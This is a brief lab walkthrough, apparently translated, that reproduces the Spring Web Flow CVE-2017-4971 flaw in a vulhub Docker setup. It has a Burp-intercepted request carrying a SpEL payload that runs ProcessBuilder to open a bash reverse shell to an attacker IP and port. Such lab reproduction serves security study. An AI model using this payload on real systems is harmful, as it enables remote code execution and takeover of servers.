1. Set up the environment
cd vulhub/spring/CVE-2017-4971
docker-compose up -d
Affected versions: Spring Web Flow 2.4.0 ~ 2.4.4
Trigger conditions: 1.
The useSpringBeanBinding parameter of the MvcViewFactoryCreator object needs to be set to false (default value)
2. The BinderConfiguration object is set to empty in the flow view object
2. Vulnerability recurrence
1. Log in
Click the link below and use the default account on the left to log in
http://192.168.25.128:8080/login
After logging in
ClickProceed
2. Capture packets
. Enable burp packet capture, intercept, and click confirm at the same time.
3.Nc turns on monitoring
4. Modify package data
&_(new+java.lang.ProcessBuilder("bash","-c","bash±i+>%26+/dev/tcp/192.168.155.2/1122+0>%261")) .start()=vulhub
splices it behind the csrf. Remember to change the IP and port to those of your own attack machine.
5. Rebound shell
Note that when 302 appears, it means redirection, just try again.